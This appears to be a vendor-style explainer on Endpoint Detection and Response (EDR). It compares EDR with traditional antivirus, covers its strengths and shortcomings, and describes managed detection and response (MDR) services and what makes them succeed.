What Is Endpoint Detection and Response (EDR)
Introducing EDR and answering your most pressing questions, this guide dives into Endpoint Detection and Response, a modern approach to endpoint security. EDR goes beyond traditional antivirus by proactively detecting suspicious behaviour and responding before harm is done. Read more for an in-depth look at EDR and MDR and how they can bolster your organisation's cybersecurity posture.
What is EDR?
EDR stands for Endpoint Detection and Response. It's considered the next-generation Endpoint Protection because it uses a modern, sophisticated, and data-centred approach to pre-emptively detect malicious activity and respond to threats before endpoint compromise occurs. It can also be configured to automatically remediate a host if it's compromised.
What is the difference between EDR and Endpoint Protection (AV)?
The short answer is: Endpoint Protection finds evidence of compromise (anti-virus) and EDR detects malicious behaviour that could result in compromise.
Traditional Endpoint Protection is very file-focused. It’s a scheduled file-scanning application that only detects a threat once it's manifested as a compromised file. It’s anti-virus and by extension anti-malware.
By contrast, EDR uses multiple monitoring points to detect attempts to compromise the system. EDR scans memory, running processes, network activity, and common attack rule set to pre-emptively stop threats before they can change files or exfiltrate data.
Traditional endpoint protection is a requirement for many organisations and an EDR solution complements it for best possible endpoint coverage.
What does EDR do well?
By design, EDR is meant to proactively detect behaviours that indicate a threat, attack, or compromise. Its scope of detection on the endpoint is wider and oddly less obtrusive and resource-hungry than a heavy endpoint protection client.
In general, EDR is also designed to be integrated with other products in the environment. Whether it's shipping log files to a SIEM or exposing an API for a customised response, it's meant to be highly configurable and tunable.
Where does EDR fall short?
While EDR sounds like the superior defence, that comes at a cost — complexity. EDR solutions generate vast quantities of data which must be shipped off the endpoint. And if your organisation is of any significant size, the data storage requirements can be overwhelming.
EDR is also configuration-heavy. While endpoint protection is one install and a signature update from the vendor, EDR can involve configuration to ship log files to a central store for analysis. If that analysis happens in the cloud, there can be some delays in effectiveness.
Finally, EDR is great at determining threat detection with a high degree of confidence, but those findings are useless without a human analyst to verify them and define a course of action in response. If the data is huge and "noisy," the chances of a quick response are low.
What is MDR?
Managed EDR, or MDR, is a refinement of the EDR concept. It’s a managed security service that involves a technically strong team of analysts reviewing EDR data and determining which pieces are useful and which aren't, then tuning the system to be more efficient and accurate at finding and reporting threats. This team would also configure EDR to respond to identified threats automatically.
What is MDR vs Threat Hunting? Or Is Threat Hunting the same thing as MDR?
MDR is essentially outsourced Threat Hunting by analysts who understand your network(s) and technologies in use to affect the best possible strategies for finding threats.
What makes an MDR service successful?
A successful MDR service is a collaboration between teams.
The MDR team provides comprehensive knowledge and experience in types of threats and how to mitigate them as well as the methods by which the best and most efficient detection and automated response can be achieved. This is accomplished by using any number of popular EDR products.
The customer's team helps to provide necessary access and data from their organization's network and endpoints, as well as any collected intelligence from prior engagements.